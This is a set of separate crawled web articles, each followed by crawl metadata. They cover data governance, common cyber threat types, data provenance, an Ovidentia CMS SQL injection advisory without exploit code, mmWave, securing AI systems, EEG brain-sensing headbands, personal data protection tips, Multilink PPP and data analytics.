Data governance establishes the structures, principles, and approaches that companies use to make decisions about all relevant data issues. By contrast, data management is about the practices and tools to make data available and useful. Both areas aim to make data available, secure, and efficient. But the technical practices of data management rely on the policy and principles of data governance.
This article will introduce and compare these two important areas. Data governance and data management are both important elements of a healthy digital ecosystem – they are at the heart of a successful digital transformation. By the time we’re through, you’ll have no trouble telling the difference!
What is data governance?
Data governance is one specific component of organizational governance, risk, and compliance procedures. Data governance tries to achieve the following goals:
- Reliability of access, retrieval, and permissions
- Compliance with relevant legal frameworks
- Security of all data within an organization.
There are many tools to make this happen. Good data governance could be achieved through:
- A clear template for decision making
- Explicit structures of accountability
- Creating strong methods for harmonizing data across an organization.
These issues are important for organizations of any size. However, strong data governance is absolutely essential in larger organizations. If a company has a range of different sites, tech sprawl, and many separate business units, it becomes very hard to know who is responsible for data policies.
Even the simple matter of who is responsible for decision making might be unclear to regular employees. Indeed, 2020 Research from Deloitte suggests that this is a problem for “a surprising number of organizations”. As a result, governance optimization should be a part of any digital transformation program.
What is data management?
Data management works on the practical side of data. Data management helps companies to collect, store, organize, protect, and maintain data throughout its lifecycle.
Just like data governance, data management helps to make sure that all data in a company is high-quality, available, reliable, and useful. However, data management does this through different activities. Those might include:
- data integration
- data quality assurance,
- data storage
- data security
- data privacy
- data migration
- data strategy development.
Effective data management enables organizations to make informed decisions, identify opportunities, and address challenges. It also contributes to improved operational efficiency, better customer experiences, and enhanced competitiveness in the market. As data continues to grow in volume and complexity, proper data management becomes increasingly vital for businesses and institutions.
Data management also is one of the core practical competencies that will help to accelerate digital transformation.
How are data governance and data management similar?
Data management and data governance are closely related concepts. They work together to ensure the proper handling, quality, security, and usability of data within an organization. While they have distinct focuses, they share similarities and often overlap in their objectives and practices.
- The two areas have Common Goals. Both data management and data governance aim to improve the overall quality, accuracy, and reliability of data. They strive to ensure that data is available, accessible, and meaningful to support business processes, decision-making, and strategic initiatives.
- They are both necessary for solid Compliance and Regulations. Data governance plays a significant role in ensuring compliance with industry regulations, legal requirements, and data protection laws. Data management supports these efforts by implementing the necessary controls and processes to handle data appropriately.
- Both teams are fundamentally collaborative. They require collaboration across various departments and roles within an organization. Effective communication and coordination are essential to ensure that data-related practices are standardized and followed consistently.
How are data governance and data management different?
So – there’s plenty of similarities between these areas, but there are also differences worth being aware of. These are down to their focus, scope, responsibility, and where the responsibility for decision-making lies:
- The two areas focus on different parts of the data lifecycle. While data management focuses more on the technical and operational aspects of handling data, data governance is more concerned with establishing policies, standards, and controls.
- The scope of each principle is different. The key foundations of data governance go a lot deeper than those of data management. Data management is narrower in scope and revolves around technical processes.
- The responsibility for management and governance should be handled by separated teams (or individuals). This means that decision-making is very different – decisions about data management can be made on the fly by technical experts. Data governance changes will take a longer period of time, with more signs offs from different parts of the company’s leadership team.
Data quality relies on both!
Overall, you shouldn’t make a choice between data governance and data management. A data-driven organization will rely on both disciplines to achieve data integrity, break down data silos, and ensure that data is always used effectively.
As a result, there’s no doubt that both areas require significant investment. As we’ve seen:
- Data governance gives the overarching guidelines for accountability, authority, and direction.
- Data management implements practices that make sure the governance policies are followed effectively.
- The two areas have distinct overlaps in their goals and the specific areas they are concerned with.
- However, management and governance involve slightly different scopes, processes, and personnel.
The two concepts complement each other, creating a holistic approach to managing and governing data effectively. In short, don’t make “data governance vs data management” into a fight to the death – the only loser will be your business! | <urn:uuid:dae91726-848c-455f-ae4a-eda5b5ce4401> | CC-MAIN-2024-38 | https://www.digital-adoption.com/data-governance-vs-data-management/ | 2024-09-08T15:57:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00441.warc.gz | en | 0.937537 | 1,154 | 3.046875 | 3 |
Every organization, regardless of size or industry, can be a target of a cyberattack resulting in significant financial and reputational damages. Internet-enabled theft, fraud, and exploitation were responsible for a staggering $2.7 billion in financial losses in 2018. The FBI receives an average of 900 internet crime complaints each day, according to the FBI Internet and Crime Complaint Center. The Ponemon Institute states that, on average, it takes organizations 191 days to identify a data breach.
Fileless Attacks are on the rise and exploit vulnerabilities in software and applications already installed on a computer. They also can be embedded into webpages. This type of attack, typically undetected through traditional antivirus software, is ten times more likely to succeed than file-based attacks. Approximately 77% of compromised attacks in 2017 were fileless. (Ponemon Institute).
Zero-day attacks are similar to fileless attacks and exploit a security vulnerability in a webpage or application that is unknown to the organization. These attacks can reveal passwords, personal information, browsing history, and more. There is no time between when the vulnerability is discovered and the attack. Zero-day attacks are increasing among advanced hackers and can be some of the most difficult to defend against. Zero- day attackers want to remain undetected as long as possible and exploit victims incessantly for days, months, or even years. There are countless new vulnerabilities exploited daily via zero-day attacks.
Cryptojacking is the unauthorized use of someone else’s computer to mine cryptocurrency. Attackers prey on insecure web applications and servers that are exposed to the internet or are located in an internal network. They plant cryptomining code to use and consume resources and extract data. There is a rise in cryptojacking attacks as well as constant attention to misconfigured public cloud instances.
Phishing emails are complex, highly-targeted attacks that have grown in sophistication due to professional hackers recognizing the significant financial opportunity in identifying and targeting employees within an organization. Phishing emails can appear to be sent from a colleague discussing a current project, because the attacker has taken the time to discover corporate initiatives. The majority of malware is still delivered by email.
Ransomware, a form of malware that holds a computer hostage until a ransom is paid to the attacker, is the most popular phishing attack. Ransomware attacks are growing in both frequency and sophistication, despite best efforts from industry experts and law enforcement. In fact, nearly 93% of phishing emails contain or link to ransomware.
Distributed denial of service (DDoS) attacks are launched from multiple computers and internet connections to flood targeted network infrastructure with traffic — ultimately causing a denial of service. DDoS attacks are becoming more frequent and longer-lasting, causing more financial and reputational damage than ever before.
For more information, visit www.fnts.com. | <urn:uuid:b803ac7e-81e9-4f03-873a-1e59b077983c> | CC-MAIN-2024-38 | https://www.missioncriticalmagazine.com/articles/92574-security-threats-increasing-in-frequency-complexity-scale | 2024-09-13T14:31:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00041.warc.gz | en | 0.952033 | 583 | 2.984375 | 3 |
Data provenance is essential for maintaining trust and integrity in data management. It involves tracking the origin of data and understanding how it has been processed and handled over time. By focusing on fundamental principles such as identity, timestamps, and the content of the data, organisations can ensure that their data remains accurate, consistent, and reliable.
Implementing data provenance does not require significant changes or large investments. Existing technologies and techniques can be seamlessly integrated to provide greater transparency and control over data. With data provenance, businesses can confidently manage their data, enhancing decision-making and fostering stakeholder trust.
In this episode, Jon Geater, Co-Chair of the Supply Chain Integrity Transparency and Trust (SCITT) Working Group, speaks to Paulina Rios Maya, Head of Industry Relations, about data provenance.
- Data provenance is knowing where data comes from and how it has been handled, ensuring trust and integrity.
- The fundamental principles of data provenance include identity, timestamps, and the content of the data.
- Data provenance can be implemented by integrating existing technologies and techniques without significant changes or investments.
- Data provenance helps with compliance, such as GDPR, by providing a transparent record of data handling and demonstrating compliance with requests.
00:00 - Introduction and Background
02:01 - Understanding Data Provenance
05:47 - Implementing Data Provenance
10:01 - Data Provenance and Compliance
13:50 - Success Stories and Industry Applications
18:10 - Conclusion and Call to Action | <urn:uuid:71e6e0df-b8a3-4d62-9fab-f91ab184135d> | CC-MAIN-2024-38 | https://em360tech.com/podcast/why-data-provenance-matters-for-your-business | 2024-09-14T16:44:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00841.warc.gz | en | 0.883503 | 322 | 2.84375 | 3 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Ovidentia CMS 6.x contains a SQL injection vulnerability in the "id" parameter of index.php. The "checkbox" property into "text" data can be extracted and displayed in the text region or in source code.
CWE-89 - SQL Injection
Structured Query Language (SQL) injection attacks are one of the most common types of vulnerabilities. They exploit weaknesses in vulnerable applications to gain unauthorized access to backend databases. This often occurs when an attacker enters unexpected SQL syntax in an input field. The resulting SQL statement behaves in the background in an unintended manner, which allows the possibility of unauthorized data retrieval, data modification, execution of database administration operations, and execution of commands on the operating system. | <urn:uuid:427f1e92-d678-4fb3-a1c4-911cbfd30d26> | CC-MAIN-2024-38 | https://devhub.checkmarx.com/cve-details/cve-2021-29343/ | 2024-09-15T22:41:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00741.warc.gz | en | 0.814147 | 165 | 2.5625 | 3 |
What is mmWave?
Millimetre wave (mmWave) is a high-frequency band of the electromagnetic spectrum. MMwave frequencies are typically between 30 GHz and 300 GHz. These frequencies are much higher than those used in cellular networks and Wi-Fi, which operate in the low- to mid-GHz range.
MMwave signals have very short wavelengths, which means they can carry a lot of data. But because they are so high-frequency, they are also very susceptible to interference and obstacles. This makes it difficult to use mmWave for long-range communications.
MMwave is being used in some 5G cellular networks, as well as in short-range applications such as WiFi 6. | <urn:uuid:85d6228a-bda9-4cfa-ad73-928fb90b0fa5> | CC-MAIN-2024-38 | https://inseego.com/uk/resources/5g-glossary/what-is-mmwave/ | 2024-09-16T00:21:10Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00741.warc.gz | en | 0.977391 | 143 | 4.125 | 4 |
With numerous cloud storage applications, VPNs, and remote servers all referring to latency, it’s important to identify just what latency is.
In the simplest terms, latency refers to the delay between making an action on a web application or server and when that action actually takes place. At its core, it’s the total time accrued for data to travel, usually measured in milliseconds. While latency can be shortened or narrowed, it can never be instantaneous because the data must travel a physical distance.
If you’ve ever uploaded files to a cloud storage application like OneDrive, Google Drive, or Drop Box, the time it takes for the data to be available in the cloud is your latency. Large files can take several minutes or more depending on the size. It might not seem too long to wait for a single upload, but if a team of remote users are collaborating on a large file, high latency means a lot of time will be spent discovering ways to waiting for file uploads and downloads.
VPNs are a common way for businesses to secure connections to private networks for remote users. With a single sign on, a user can access their in-office desktop or on-premises server. In terms of latency, the most obvious variable is the physical distance the remote user is to the server they’re connecting to. It would be quite a bit longer to transfer data from Australia to Canada, for example, than it would be from New York to Boston. While decreasing the distance to the server is not always an option, there are other ways to narrow latency.
As mentioned above, latency can never be instantaneous. With each additional node in a VPN, latency increases. For example, if a remote user accesses their in-office desktop to then access the on-premises server from that desktop, latency will be increased. Removing the different steps to access data is a surefire way to lower latency.
Another way to shrink latency and garner faster download and upload speeds is to decrease the server load. Although this is easy enough using a personal VPN that can access servers all over the world, it becomes more difficult for small to medium-sized businesses for different reasons. As Network Attached Storage (NAS) is usually located on the premises of a business, all remote users would be accessing the same servers and storage. Therefore, decreasing server load isn’t always an option for most businesses.
One of the easiest, but not the most cost-effective ways to lower latency is to upgrade a user’s internet speed. Because latency is defined by speed, the faster a user’s connection, the quicker data can transfer. Downloading or uploading files to cloud storage applications can vary widely with different internet speeds. If a user is in a remote location with a less than ideal internet connection, latency could become a larger issue.
Fortunately, there are alternative models to VPNs and cloud storage applications. Operating with the same functionality as a traditional NAS, a Cloud NAS offers users a low latency solution. Instead of routing through various nodes to access the desired server and thus increasing latency, the user has instant access to their files in the Cloud NAS. In that vein, users won’t need to upload or download to a storage application as everything will be immediately available. And for those remote users with tough internet connections? Morro Data’s CacheDrive allows large files to be instantly accessible.
Learn more about Morro Data and Cloud NAS today! | <urn:uuid:6602b63f-eca2-4ef6-bf7f-8dace51abf1b> | CC-MAIN-2024-38 | https://www.morrodata.com/latency-vpns-and-cloud-storage/ | 2024-09-15T22:33:14Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00741.warc.gz | en | 0.941216 | 709 | 2.84375 | 3 |
AI Series Part 6: Securing and Fixing AI-Based Systems
This is the sixth and final piece in a series exploring the impacts of artificial intelligence on modern life and the security of AI-based systems. In the previous article, we discussed some of the security issues associated with AI, and we explore how to secure and fix AI in this piece.
How to Secure AI-Based Systems
Machine learning algorithms can suffer from explicit biases in the best of circumstances. This makes it relatively easy for an intentional attack against these systems to result in an inaccurate and ineffective decision-making system.
Performing adversarial testing and corrupting training data are two ways in which an attacker can “hack” an AI-based system. Protecting against these potential attack vectors is essential to ensuring AI accuracy and security.
Perform Adversarial Testing First
Systems built using machine learning are designed to build a model from a set of observations and use this model to make decisions. This means that an AI-based system could be trained to predict and manipulate the decisions of another AI-based system, a practice called “adversarial testing.”
As AI-based systems become more central to daily life and used in critical decision-making, such as autonomous vehicles or cyber defense, cyber threat actors will employ adversarial machine learning against these systems. The best way to protect against these types of attacks is to do so first.
By performing adversarial testing of machine learning systems, the developers can identify weak points in the model where a small change can have a dramatic impact on the results. This information can be used to inform further training of the system, resulting in a model that is more resilient against attack.
Modern machine learning algorithms are imperfect, meaning that they make classification errors. Human beings are far better at certain types of problems than machines, which is why image-based CAPTCHA challenges are a common method of bot detection and defense. However, by using adversarial machine learning to make it more difficult to identify these weak points in a model, machine learning developers can increase the resilience of their systems against attack.
Implement Training Data Verification and Validation Processes
Good training data is essential to the effectiveness of an AI-based system. Machine learning systems build their models based on their training datasets. If the training data is inaccurate or corrupted, the resulting AI model is broken as well.
For this reason, corruption of training data is a low-tech approach to breaking AI systems. Whether by inserting incorrect data into initial training datasets or performing “low and slow” attacks to slowly corrupt a model, an attacker can skew a machine learning model to misclassify certain types of data. This could result in a missed cyberattack or an autonomous car running a stop sign.
The datasets that AI-based systems train on are often too large and complex to be completely audited by humans. However, machine learning researchers can attempt to minimize the risk of these types of attacks via random inspections. By manually validating a subset of the data and the machine learning algorithm’s classifications, it may be possible to detect corrupted or otherwise inaccurate inputs that could undermine the accuracy and effectiveness of the machine learning algorithm.
Beyond this, standard data security practices are also a good idea for training datasets. Restricting access to training data, performing integrity validation using checksums or similar algorithms, and other steps to ensure the accuracy of training data can help to identify and block attempts at corruption of training data.
Building AI for the Future
As earlier articles in this series have discussed, artificial intelligence is already a major part of daily life. As AI becomes more mature, this will only become more common as machine learning algorithms are deployed to solve hard problems in a variety of different industries.
AI has the potential to do a lot of good, but it can also cause a lot of damage in the wrong hands. In addition to making sure that AI works, it is also essential to ensure that it does its job accurately and securely. | <urn:uuid:32f76647-4612-4cef-8f28-328c03e4c974> | CC-MAIN-2024-38 | https://netragard.com/ai-series-part-6-securing-and-fixing-ai-based-systems/ | 2024-09-18T10:39:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00541.warc.gz | en | 0.956753 | 820 | 2.9375 | 3 |
Picture this. You’re back in school, it’s exam week, you have multiple exams coming up that you absolutely need to do well on, but lately you have been getting so flustered with the tasks you need to get done that you unintentionally lose focus.
Sound like a familiar scenario? Chances are you have gone through this hectic pace of thought process at one point or another in your life, but what if you were told that you can easily prevent this from ever happening again by putting on a headband for three minutes a day?
With seven sensors, five hours of battery life, and an application that tracks the user’s progress, the Muse Brain Sensing Headband allows users to become more focused through meditation. All you have to do is turn on the headband, pair it with the application, open the application, put on your headphones, and listen to the guide.
A headband that allows you to be your best self in under three minutes a day sounds like a sweet deal, but how does it exactly work?
As I was doing my research on this topic, I noticed that not many articles give an in depth analysis of how the brain receives signals, which I believe plays a crucial role in truly understanding brain sensing technology. This is why I have decided to do just that.
In this article, I will first go over the physiology of the brain as I discuss the details of neurotransmission. I will follow that with a short discussion of the technology that is inspired by this physiology. Lastly, I will go over how brain computing (or brain sensing/analyzing) is going to evolve in the coming years.
Let’s Talk Brain Science: Neurotransmission
Let’s first discuss how signal transduction works in the cells of the body. When a ligand, a small molecule that acts as a signal, binds to a receptor, a series of pathways occur within the cell that help activate a target protein or molecule.
In other words, a signal molecule latches onto a specific binding site, turns on another target molecule downstream of the receptor, and continues turning on other target molecules and proteins until the designated signal is produced. This signal produced then moves up the spine and to the brain where neurons are located.
Your brain is home to approximately 100 billion neurons, nerve cells that allow you to react to signals. These minute cells work in a very synchronized manner. A neuron consists of a nucleus, axon, dendrites, myelin sheath, and an axon terminal.
A signal is transmitted to a neuron in the form of an electrical impulse known as an ‘action potential’ which then moves from the dendrites of the neuron to the axon terminal. The action potential causes the nerve cell to release neurotransmitters (signaling molecules) which then bind to the receptor on the next neuron.
The area between the two neurons where all of this is taking place is called the synapse. If the electrical charge on these neurotransmitters that are released into the synapse is above the threshold, then an action potential will be fired, but if not, then nothing will happen and that will be the end of the signal transduction. These two states are known as the excitatory and inhibitory states respectively.
When a group of neurons experience this change in electrical impulse, they generate an electrical field which resembles a small vibration and which can be then detected on the scalp by an EEG sensors.
In short: the brain receives an electrical signal, which causes an action potential within neurons. The action potential moves across neurons through a synapse, which generates an electrical field that is detectable by sensors on the scalp.
Discovered in 1924 by a German Psychiatrist, Hans Berger, Electroencephalography technology, or EEG, works by measuring the difference in electrical field that is produced by neurotransmission in real time. In traditional EEG testing, rows of electrodes are placed on a person’s scalp with a wire that hooks them up to an amplifier that strengthens the waves that are picked up, and a computer which records all of the data.
The data is presented on a graph in real time as the electrodes are picking up the electrical field on the scalp. Scientists decode this data by analyzing the types of waves that are presented. There are a total of five different wavelength patterns: Delta, Theta, Alpha, Beta, and Gamma (least to greatest in wavelength frequency).
These neural patterns that are picked up by the electrodes are then used by researchers to analyze cognitive behavior. For instance, in sleep research, researchers will look for delta waves to see how deep a patient is able to fall asleep. Likewise, they will look for higher frequency waves such as gamma or beta waves to check if the patient is still in REM sleep.
With its noninvasive method of use, this technology allows scientists and physicians to record when and where a particular activity has taken place in a subject’s brain. From these findings, they are then be able to interpret how the subject was feeling during a particular conversation – were they bored and unresponsive? Engaged and thinking critically? Were they focused on the conversation or task without any interruptions?
From sleep behavior to consumer behavior, EEG technology allows us to delve deeper into the human brain on a more factual basis.
The IoT Method to Brain Sensing
In 2014, with almost $170,000 and 644 backers, Joel Murphy and Conor Russomanno successfully released OpenBCI (BCI standing for Brain Computing Interface), an open source biosensing platform that allows consumers to track the electrical activity produced by the brain, heart, and muscle.
For the first time ever, this technology became accessible to the general public, which paved the way for world changing inventions.
Fast-forward to 2017 and you can find brain sensing products all over the web. From a headband that allows users to meditate to trendy eyewear that help athletes stay fashionable while also improving their focus, these devices are becoming prevalent in everyday life. But how do these companies incorporate EEG technology into these products to begin with?
Just as a traditional EEG cap places electrodes all across the skull, headbands like InteraXon’s Muse Brain Sensing Headband work by placing sensors along the forehead and behind the ears. Once the headset is paired with its application, the electrical impulses that are read by the sensors are immediately visualized in the app.
Depending on the types of brainwaves that are picked up, the application determines if the user needs to become more focused or not. If the waves increase in frequency, that indicates to the software that the user is distracted from the given task, and as a feedback response to these waves, the application increases the volume of the sound that the user is hearing in an attempt to get the user to refocus.
While extremely straightforward, in order to get the most accurate reading, one needs electrodes to be places all over the scalp, and around the eyes since the impulses are spread across the skull like mini vibrations.
With the frontal cortex being the primary location for problem solving, judgement, and impulse control, it makes sense why the Muse Brain Sensing Headband has sensors that are placed along the forehead.
While it may not be able to get an accurate read on the brain as a whole, it is able to track the activity of the frontal lobe, where our ability to control focus is located. Thus, this headband can strongly aid in training the frontal cortex to react more calmly to impulse and think through actions rationally with a more focused mindset.
Brain Chipping: The Future of Brain Computing Technology
Brain sensing technology is prominently used for its many medical benefits including helping cancer patients relieve stress to increase rate of recovery. However, what if these efforts can be put toward making everyday life easy and seamless as well?
By now, we’ve all heard of the new trend called “chipping,” well what if we used this same method to control everyday tasks such as turning on/off lights, locking the doors to your house, turning off your alarm clock in the morning, etc.?
At the rate this technology is being leveraged by major tech companies such as SpaceX, within the next few decades (possibly earlier), we will see people getting sensors implanted along their skull and integrated with different software to allow human beings to take full control of their lives.
Looks like movies aren’t all lies after all. The only plot twist in this reality movie is that we are becoming our own robots. Until then, however, there’s a lot of work that has to be done to ensure clear, precise data before we can start merging the human brain with AI. | <urn:uuid:53f94227-3d9f-4c79-b40c-c7e78e6cba19> | CC-MAIN-2024-38 | https://www.iotforall.com/brain-sensing-technology-muse-headband | 2024-09-18T10:34:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00541.warc.gz | en | 0.953475 | 1,787 | 3.015625 | 3 |
Online Data Protection - What, Why & How?
Date: 26 October 2022
Data is the new gold. Every business out there is looking for precious customer data on which to base their marketing endeavours, engineer new products and target the correct audiences. Therefore, protection of data and preventing the misuse of sensitive personal information has become extremely critical in the digital age.
It is not only important for businesses to prioritise the safety of sensitive customer data but also for individuals to be more mindful of their data safety.
What is Personal Data?
Personal data is your personal identifier. It's that data that is unique to you and makes you identifiable directly or indirectly. Lots of people still don't care that personal data is prone to be misused by criminals on the internet. Although in reality, personal data theft is highly dangerous and can compromise your sensitive information to a vast degree.
For businesses, it is important to pay attention to the security of the personal information they store and process, especially if they come under the purview of the General Data Protection Regulation or GDPR. Many businesses choose to hire cybersecurity experts through flexible formats like the Virtual Cyber Assistant with the assistance of GDPR software to ensure they meet GDPR compliance requirements. This also helps them improve their data protection and risk management over time.
Weak data protection in some countries has resulted in widespread data leaks of citizen information. This is evidenced by the frequent occurrence of cybercrime cases, such as hacking and cracking (piracy) social media that leads to personal data breaches, extortion, online fraud via cell phones, and many others.
Activities in the digital space require personal data because we do not meet each other physically, so data becomes an online identifier. Leakage of personal data can lead to a crime because once the hackers get it, your virtual tracks can always be traced and misused.
In the case of businesses, a breach of personal customer or employee data can be the start of serious cyber attacks or ransomware attacks on critical infrastructure. This information involves the date of birth, cell phone number, password, and other identifications.
Why Is Personal Data Protection Important?
In terms of online cybersecurity, there are five main reasons why it is important to protect personal data, namely:
- Prevent gender-related online bullying;
- Prevent misuse of personal data by irresponsible parties;
- Avoid potential fraud;
- Avoid potential defamation; and
- Gain the right of control over personal data.
Online fraud is happening every minute with hackers coming up with new and more advanced techniques all the time. Often victims are people who do not have any knowledge about this or also those who are not aware or trained enough in cybersecurity.
Every business must educate their staff in the importance of online personal data protection. They should help their employees understand how their online activity affects them and the business. Staff should also be given basic Cyber Incident Response training so they know what to do in case they feel they’ve clicked on a malicious link or downloaded an infected attachment.
Many social media applications that provide two-step verification features, backup codes, and e-mail notifications if other parties access our social media. We need to enable these features to avoid something bad from happening.
As a smart society and business community, we must be literate in digital literacy, willing to apply the culture of reading to ourselves, and double checking for any information received.
It is also advised to have an additional layer of protection, which can be obtained through VPN. Virtual Private Network works wonderfully to mask your IP so anyone wouldn’t know about your location. We recommend the best ones in the market. For further information, you can see this in-depth ExpressVPN review from Wizcase. See whether it’s suitable for you or not by considering the price and the services.
Simple Tips to Make Personal Data Secure
While online risk management can sound like a complicated subject, there are many things you can do on an individual basis to keep your information safe. Here are a few simple steps everyone can take to make their personal data more secure on the internet:
1. Create a Password and PIN as Strong as Possible
We always recommend making passwords and PINs as strong as possible, using a combination of uppercase, and lowercase letters, special characters, and numbers. You also must regularly change some passwords and PINs to prevent your account from being hacked. Also avoid using easily guessed passwords such as “12345” or your birth date etc.
2. Get Used to 2FA Activation
We must also enable 2FA (Two Factor Authentication) or two-factor authentication. 2FA wherever applicable. This is a way to protect personal data that is classified as safe because when we log in to a certain account, there will be an OTP (Time Password) code sent outside of the password. The code is sent via e-mail or SMS. So, don't forget to activate 2FA.
3. Have More Than One Email
Having multiple email accounts is highly recommended to support 2FA. In addition, some digital platforms are currently required to include a backup email. The goal is that you’ll get notifications on the alternate email when someone else breaches your first account or there are indications of an account break-in.
Be Careful in Giving Access Permissions
You also have to be careful about granting access to some digital platforms to maintain data security. Access permissions usually appear for photo and video gallery, camera, microphone, and others. If you feel unsure and suspicious about granting access, simply don't give access to the application.
Don't Post Personal Information on Social Media
If you could, do not post any information related to personal data on social media. If you want to post, sensor some important data so your personal information can remain private. It's safer not to post your personal information, such as your personal credentials, address, or phone number that identifies an individual.
Most people probably use social media today; it’s inevitable. Although some choose to be private by creating private accounts, more people decide to share everything about their life on the internet. They even share personal things like relationships, their cultural or social identity, political views, etc., without worrying about getting hacked. And this is what you need to avoid.
You may create anything you want, but remember to keep your personal matters private. To further protect you from personal data theft, creating a private account that only allows close friends to see your profile is the best.
6. Regularly Clean Cookies
The next way to protect personal data is to clean cookies regularly. Why should you regularly clean cookies? Because these cookies store important data and information about us while using or accessing certain websites on the internet.
Maintaining the sanctity of personal and business data is seriously critical today. As we said in the beginning, data is the new gold and everyone is looking for it to harness its benefits for good and harmful purposes. It is best to start putting basic data prevention measures in place and securing your sensitive and personal information at the earliest. | <urn:uuid:8a79b70a-7a67-41f5-a4e3-397c592c85e9> | CC-MAIN-2024-38 | https://www.cm-alliance.com/cybersecurity-blog/online-data-protection-what-why-how | 2024-09-21T00:53:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00341.warc.gz | en | 0.933454 | 1,445 | 2.84375 | 3 |
What Are the Pros and Cons of Net Neutrality?
November 1, 20186 Web Designing Programming Learning Sources
November 6, 2018AI has become a bigger part of our everyday lives – and it also hits the headlines a lot. It’s difficult to keep track of all the stories and new developments, but a new infographic, Rise of the Machines, aims to help separate fact from fiction.
So, What Is AI?
AI stands for artificial intelligence. Artificial intelligence is software that has the ability to learn and adapt in a way that’s similar to the human brain.
- Solve problems
There are two types of AI: narrow, which can do specific activities, and general, which can use its past experience to complete new tasks. Narrow AI is much more common.
What Can AI Do?
AI is capable of a lot of different tasks, big and small. It’s ideal for carrying out monotonous tasks that humans might get wrong or get bored of, since it doesn’t make the same errors we do, and its speed means it can save time for researchers. It’s also useful for security because it can’t be bribed or blackmailed. And its ability to make predictions could become vital for healthcare.
Read on to find out what else could be in store for AI as the technology becomes more advanced: | <urn:uuid:5a79ac5f-9765-4bad-84ee-972cbe0f343a> | CC-MAIN-2024-38 | https://www.colocationamerica.com/blog/rise-of-artificial-intelligence | 2024-09-08T19:34:50Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00541.warc.gz | en | 0.956844 | 285 | 3.015625 | 3 |
MPPP which stands for Multilink Point to Point Protocol is a protocol for inverse multiplexing of Point-to-Point Protocol (PPP) communication links. Multilink Point-to-Point Protocol (MPPP) is an extension of the industry-standard PPP. MPPP can also be abbreviated as MP or MLP.
How it works
An ordinary dial-up modem connection to the Internet through an Internet service provider (ISP) usually uses PPP as its wide area network (WAN) data-link protocol, but sometimes the 56-Kbps speed provided by V.90 modems is insufficient. MPPP allows multiple physical dial-up links to be inverse multiplexed together to form a single high-bandwidth logical PPP connection between the dial-up client and the ISP. MPPP works by ordering the data frames from the client across the multiple PPP channels and recombining them at the ISP’s termination point, and vice versa. MPPP defines protocols for splitting the data stream into PPP packets, sequencing the packets, transmitting them over separate logical data links, and then recombining them at the receiving station.
MPPP is also supported by some ISDN terminal adapters to allow two 64-Kbps Integrated Services Digital Network (ISDN) channels to be inverse multiplexed together into a single 128-Kbps channel using the bonding protocol.
More channels can be aggregated for even greater bandwidth. Microsoft Windows 98 supports MPPP for both analog modems and ISDN terminal adapters.
In the Remote Access Service (RAS) of Windows NT, MPPP is known as RAS Multilink Channel Aggregation and supports the aggregation of two or more analog modems or ISDN terminal adapters (or a combination of both). RAS Multilink Channel Aggregation was originally based on Request for Comments (RFC) 1717 and is supported by Windows NT Server and Windows NT Workstation, although it is only supported for dial-out connections on Windows NT Workstation. Multilink in the Windows 2000 Routing and Remote Access feature supports RFC 1990, which obsoletes RFC 1717.
MPPP connections aggregated across multiple routers
An extension to MPPP called Multichassis Multilink Point-to-Point Protocol (MMP), which some vendors support, allows MPPP connections to be aggregated across multiple routers and network access servers (NAS’s) in a way that is transparent to the dial-up MPPP client. In other words, the client initiates an MPPP session but is actually connected to several MMP-enabled NAS’s at the ISP instead of only one NAS as in the usual scenario. MMP enables the data stream to be split, sequenced and recombined at several different points to provide a single logical connection between the client and the ISP.
Another extension to MPPP that some vendors support is called Multichannel PPP (MPP), which in addition to inverse multiplexing of PPP links also supports session and bandwidth management functions, including the dynamic addition or removal of channels without the need to reinitialize the link. Both the client and the server must support MPP for this to work.
Using MPPP for dial-up connection to the Internet
To use MPPP for a dial-up connection to the Internet, your ISP’s NAS must also support this protocol. RAS Multilink Channel Aggregation for Windows 98 or Windows NT functions best if all devices are of the same type (analog or ISDN) and operate at the same speed. When a Windows dial-up client attempts a multilink connection, it first establishes the primary connection using the first installed device, and then it successively aggregates each additional device. | <urn:uuid:651b61bc-bb62-436f-936c-e5bcf12ad426> | CC-MAIN-2024-38 | https://networkencyclopedia.com/multilink-point-to-point-protocol-mppp/ | 2024-09-11T07:31:41Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00341.warc.gz | en | 0.906758 | 773 | 2.8125 | 3 |
In today’s data-driven economy, payments are not only made in cash at commercial banks, but also through in the exchange of personal data with search engine giants. Banks and search engines alike diligently convert and process transactions, whether in the form of cash or data, and turn them into valuable assets.
Many are all too aware of the fact that data resides everywhere and that it’s the insights you can glean from data that are more important; it’s no longer a case of who has the most data, but rather who can do the most with that data.
In this whitepaper you will learn about:
- The importance of deriving insights through analytics.
- How people who are new to analytics can get started.
- Best practice applications with regards to data analytics.
DATA IS NOT BIG, IT IS JUST GETTING BIGGER
Our hyperconnected world is generating data at an ever increasing rate; every day we collectively produce 2.5 billion gigabytes of data. Moreover, the global volume of data in today’s digital world is expected to multiply by at least another 40 times by the year 2020, much of which will consist of unstructured data.
